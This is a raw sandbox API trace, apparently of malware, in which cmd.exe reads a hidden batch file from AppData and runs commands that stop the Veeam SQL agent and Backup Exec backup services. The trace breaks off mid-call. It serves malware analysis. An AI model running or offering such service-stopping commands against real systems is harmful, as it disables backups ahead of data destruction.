FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0206.269] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0206.269] GetLastError () returned 0x2 [0206.270] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0206.270] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0206.270] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0206.271] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0206.271] SetErrorMode (uMode=0x0) returned 0x1 [0206.271] GetProcessHeap () returned 0x3e0000 [0206.271] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0206.271] GetProcessHeap () returned 0x3e0000 [0206.271] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0206.271] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0206.271] GetProcessHeap () returned 0x3e0000 [0206.271] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0206.272] GetProcessHeap () returned 0x3e0000 [0206.272] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0206.272] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0206.272] GetProcessHeap () returned 0x3e0000 [0206.272] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0206.272] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0206.272] GetProcessHeap () returned 0x3e0000 [0206.272] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0206.272] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0206.272] GetProcessHeap () returned 0x3e0000 [0206.272] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0206.273] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.273] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0206.273] GetLastError () returned 0x2 [0206.274] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0206.274] GetLastError () returned 0x2 [0206.274] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.274] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0206.275] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0206.275] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0206.275] GetLastError () returned 0x2 [0206.275] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0206.276] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0206.276] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0206.276] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0206.276] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0206.276] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0206.277] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0206.277] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SQLAgent$VEEAMSQL2008R2 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SQLAgent$VEEAMSQL2008R2 /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SQLAgent$VEEAMSQL2008R2 /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x6f4, dwThreadId=0x5e4)) returned 1 [0206.289] CloseHandle (hObject=0x74) returned 1 [0206.289] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0206.289] GetProcessHeap () returned 0x3e0000 [0206.289] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0206.289] GetEnvironmentStringsW () returned 0x3f8408* [0206.289] GetProcessHeap () returned 0x3e0000 [0206.289] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0206.289] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0206.289] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0206.429] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0206.430] CloseHandle (hObject=0x78) returned 1 [0206.430] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0206.430] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0206.430] GetProcessHeap () returned 0x3e0000 [0206.430] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0206.431] GetEnvironmentStringsW () returned 0x3f8408* [0206.431] GetProcessHeap () returned 0x3e0000 [0206.431] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0206.432] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0206.432] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0206.432] GetProcessHeap () returned 0x3e0000 [0206.432] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0206.432] GetEnvironmentStringsW () returned 0x3f8408* [0206.432] GetProcessHeap () returned 0x3e0000 [0206.432] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0206.432] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0206.432] GetProcessHeap () returned 0x3e0000 [0206.432] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0206.432] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0206.432] _get_osfhandle (_FileHandle=1) returned 0x264 [0206.432] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0206.432] _get_osfhandle (_FileHandle=1) returned 0x264 [0206.432] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0206.433] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0206.433] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0206.433] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0206.433] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0206.433] SetConsoleInputExeNameW () returned 0x1 [0206.433] GetConsoleOutputCP () returned 0x1b5 [0206.433] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0206.433] SetThreadUILanguage (LangId=0x0) returned 0x409 [0206.433] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0206.434] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0206.434] _get_osfhandle (_FileHandle=3) returned 0x78 [0206.434] SetFilePointer (in: hFile=0x78, lDistanceToMove=4096, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1000 [0206.434] GetProcessHeap () returned 0x3e0000 [0206.434] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0206.434] GetProcessHeap () returned 0x3e0000 [0206.434] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0206.434] GetProcessHeap () returned 0x3e0000 [0206.434] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0206.434] GetProcessHeap () returned 0x3e0000 [0206.434] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0206.434] GetProcessHeap () returned 0x3e0000 [0206.434] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0206.434] GetProcessHeap () returned 0x3e0000 [0206.434] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0206.434] GetProcessHeap () returned 0x3e0000 [0206.434] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0206.434] GetProcessHeap () returned 0x3e0000 [0206.434] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0206.434] GetProcessHeap () returned 0x3e0000 [0206.434] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0206.434] GetProcessHeap () returned 0x3e0000 [0206.434] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0206.434] GetProcessHeap () returned 0x3e0000 [0206.434] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0206.434] GetProcessHeap () returned 0x3e0000 [0206.434] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0206.434] GetProcessHeap () returned 0x3e0000 [0206.434] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0206.435] _get_osfhandle (_FileHandle=3) returned 0x78 [0206.435] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1000 [0206.435] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x8c1, lpOverlapped=0x0) returned 1 [0206.435] SetFilePointer (in: hFile=0x78, lDistanceToMove=4132, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1024 [0206.435] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=36, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop BackupExecAgentBrowser /y\r\n\ny\r\n/y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 36 [0206.435] _get_osfhandle (_FileHandle=3) returned 0x78 [0206.435] GetFileType (hFile=0x78) returned 0x1 [0206.435] _get_osfhandle (_FileHandle=3) returned 0x78 [0206.435] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1024 [0206.435] GetProcessHeap () returned 0x3e0000 [0206.435] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0206.435] GetProcessHeap () returned 0x3e0000 [0206.435] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0206.439] _tell (_FileHandle=3) returned 4132 [0206.439] _close (_FileHandle=3) returned 0 [0206.439] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0206.439] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0206.439] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0206.439] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0206.439] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0206.439] _wcsicmp (_String1="net", _String2="CD") returned 11 [0206.439] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0206.439] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0206.439] _wcsicmp (_String1="net", _String2="REN") returned -4 [0206.439] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0206.439] _wcsicmp (_String1="net", _String2="SET") returned -5 [0206.439] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0206.439] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0206.439] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0206.439] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0206.439] _wcsicmp (_String1="net", _String2="MD") returned 1 [0206.439] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0206.439] _wcsicmp (_String1="net", _String2="RD") returned -4 [0206.439] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0206.439] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0206.439] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0206.439] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0206.439] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0206.439] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0206.439] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0206.439] _wcsicmp (_String1="net", _String2="VER") returned -8 [0206.440] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0206.440] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0206.440] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0206.440] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0206.440] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0206.440] _wcsicmp (_String1="net", _String2="START") returned -5 [0206.440] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0206.440] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0206.440] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0206.440] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0206.440] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0206.440] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0206.440] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0206.440] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0206.440] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0206.440] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0206.440] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0206.440] SetErrorMode (uMode=0x0) returned 0x1 [0206.440] GetProcessHeap () returned 0x3e0000 [0206.440] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0206.440] GetProcessHeap () returned 0x3e0000 [0206.440] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0206.441] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0206.441] GetProcessHeap () returned 0x3e0000 [0206.441] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0206.441] GetProcessHeap () returned 0x3e0000 [0206.441] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0206.441] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0206.441] GetProcessHeap () returned 0x3e0000 [0206.441] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0206.441] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0206.441] GetProcessHeap () returned 0x3e0000 [0206.441] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0206.442] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0206.442] GetProcessHeap () returned 0x3e0000 [0206.442] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0206.442] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.443] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0206.443] GetLastError () returned 0x2 [0206.443] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0206.443] GetLastError () returned 0x2 [0206.443] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.444] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0206.444] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0206.444] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0206.445] GetLastError () returned 0x2 [0206.445] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0206.445] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0206.445] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0206.446] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0206.446] SetErrorMode (uMode=0x0) returned 0x1 [0206.446] GetProcessHeap () returned 0x3e0000 [0206.446] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0206.446] GetProcessHeap () returned 0x3e0000 [0206.446] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0206.446] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0206.446] GetProcessHeap () returned 0x3e0000 [0206.446] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0206.446] GetProcessHeap () returned 0x3e0000 [0206.446] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0206.447] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0206.447] GetProcessHeap () returned 0x3e0000 [0206.447] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0206.447] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0206.447] GetProcessHeap () returned 0x3e0000 [0206.447] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0206.447] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0206.447] GetProcessHeap () returned 0x3e0000 [0206.447] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0206.448] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.448] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0206.448] GetLastError () returned 0x2 [0206.449] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0206.449] GetLastError () returned 0x2 [0206.449] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.449] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0206.449] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0206.450] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0206.450] GetLastError () returned 0x2 [0206.450] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0206.450] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0206.451] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0206.451] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0206.451] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0206.451] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0206.452] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0206.452] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop BackupExecAgentBrowser /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop BackupExecAgentBrowser /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop BackupExecAgentBrowser /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x7f0, dwThreadId=0x734)) returned 1 [0206.455] CloseHandle (hObject=0x78) returned 1 [0206.455] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0206.455] GetProcessHeap () returned 0x3e0000 [0206.455] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0206.455] GetEnvironmentStringsW () returned 0x3f8408* [0206.456] GetProcessHeap () returned 0x3e0000 [0206.456] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 